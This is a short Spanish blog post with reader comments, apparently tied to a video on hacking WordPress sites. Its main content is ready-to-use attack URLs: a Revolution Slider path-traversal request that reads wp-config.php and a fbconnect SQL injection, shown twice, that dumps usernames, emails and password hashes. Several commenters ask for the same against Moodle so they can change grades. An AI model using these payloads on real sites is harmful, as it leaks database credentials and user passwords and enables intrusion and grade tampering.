3 maneras de Hackear WordPress
El dÃa de hoy hablaremos acerca de como hackers logran hackear sitios que utilizan la plataforma WordPress.
Video – 3 maneras de Hackear WordPress:
http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.website.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users–
http://www.website.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users–
Seria bueno que hagas de Moodle
Ahora solo falta Moodle para cambiar las calificaciones.
estudia, eso es lo único que no te podrán quitar, tu conocimiento
Muy buena info 🙂
Acabo de ver el video y aún no pruebo lo que mencionas, pero de inicio me queda la duda si el fallo que permite el cambio realizado por petición XMLHttpRequest se debe a wordpress o algún plugin en especÃfico.